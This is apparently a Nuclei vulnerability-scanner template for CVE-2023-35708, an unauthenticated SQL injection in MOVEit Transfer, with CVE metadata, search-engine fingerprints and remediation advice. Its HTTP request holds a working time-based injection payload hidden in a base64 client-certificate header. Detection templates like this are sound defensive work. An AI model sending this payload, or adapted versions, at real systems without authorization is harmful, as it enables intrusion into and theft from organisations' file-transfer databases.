id: CVE-2023-35708

info:
  name: MOVEit Transfer - SQL Injection
  author: daffainfo,jjcho
  severity: critical
  description: |
    In Progress MOVEit Transfer before 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to MOVEit Transfer's database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. These are fixed versions of the DLL drop-in: 2020.1.10 (12.1.10), 2021.0.8 (13.0.8), 2021.1.6 (13.1.6), 2022.0.6 (14.0.6), 2022.1.7 (14.1.7), and 2023.0.3 (15.0.3).
  impact: |
    Attackers can modify and disclose sensitive database content, leading to data breach and potential system compromise.
  remediation: |
    Update to fixed versions: 2020.1.10, 2021.0.8, 2021.1.6, 2022.0.6, 2022.1.7, or latest available version.
  reference:
    - https://x.com/wvuuuuuuuuuuuuu/status/1679969146635710469
    - https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-15June2023
    - https://www.progress.com/security/moveit-transfer-and-moveit-cloud-vulnerability
    - https://nvd.nist.gov/vuln/detail/CVE-2023-35708
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-35708
    cwe-id: CWE-89
    epss-score: 0.81216
    epss-percentile: 0.99188
    cpe: cpe:2.3:a:progress:moveit_transfer:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: progress
    product: moveit_transfer
    shodan-query: http.favicon.hash:989289239
    fofa-query: icon_hash=989289239
  tags: cve,cve2023,moveit,sqli,progress,vkev,vuln

http:
  - raw:
      - |
        @timeout: 20s
        GET /machine.aspx HTTP/1.1
        Host: {{Hostname}}
        X-IPSGW-ClientCert: MIIDHzCCAgegAwIBAgIUL1Wu3MEgQSoE0t0TOHgicFEMPXgwDQYJKoZIhvcNAQELBQAwHzEdMBsGA1UEAwwUJztTRUxFQ1QgU0xFRVAoNik7LS0wHhcNMjYwMTIzMDEwNzMyWhcNMjYwMjIyMDEwNzMyWjAfMR0wGwYDVQQDDBQnO1NFTEVDVCBTTEVFUCg2KTstLTCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEBAKJwqBj5z2idKyd5Z6SejFmAEiL+HjMITz598Jf8PhA3Xp32VQC+CS65Y8sf9X8S60kI457pusx28onM7txaQJu1Ln/DWtmWA1Hjfzo8/tCM6cZ8V22xI2dmHb2H28gBczx0lcr4LwrNZcO2rg+vq//BZwUes+QTkRUIIWZvFfxaZ+s5WbbmUhhzxJ2YeUvrYv6HuVkeHl9/v3ywQfGUHmBuzw+IGq7H+pRNdwYrJTWPT+Tb9XchhT87nn/eUxVAN9e5pkHLB+1qku/iWvdJKdvuo6x+srucZzW179Uoj9JIpzuG99PCWG8n6gMQhU0Qq2c6Jq2eUfyC9Y/Q7onDCPsCAwEAAaNTMFEwHQYDVR0OBBYEFP6gtIaFKgU2Bd3E++r1baKWETy7MB8GA1UdIwQYMBaAFP6gtIaFKgU2Bd3E++r1baKWETy7MA8GA1UdEwEB/wQFMAMBAf8wDQYJKoZIhvcNAQELBQADggEBAEzzUrpQlqeA17/glAVDdidkpNcBjOXv0JaoC/zirK3ByN63SC115nIPlRh0oksjCdO2HRJwdaZr0u7XYlxtH07DHqycZPX7gLWW5SWRRcf0kgvpXMgPQMkxSp+gQwaietSou8lJWkKPZtNJUVU/YZWsSY4iBZ5UbWO07UEV8VPcs6Ym8it1rW0lXg8Iy/u0UV/nFDeD8q4HUXk74DpFNkhMeDGVClb36iWxPvRFKpj3zR11huVWG/s0CeiuekTXxxicKPssJhBROGKAukiuYDGmLS95vILIbbh6cNfcZLzcTq3QW6YpLIR2UuXKwVwCEqHuEnLJw43TkZwqoxQ2vuY=

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'duration>=6'

      - type: word
        part: body
        words:
          - '<siLockResponse>'
          - '<ErrorCode>'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a00473045022063e1c31b3044e6851189a41866842fd68ffe2967a0c46cdbca6e312294aec51f022100a863c86fdf19bd05e5761fb9f65f52fee847fe02bf40dc0f8a75132d87821d2e:922c64590222798bb761d5b6d8e72950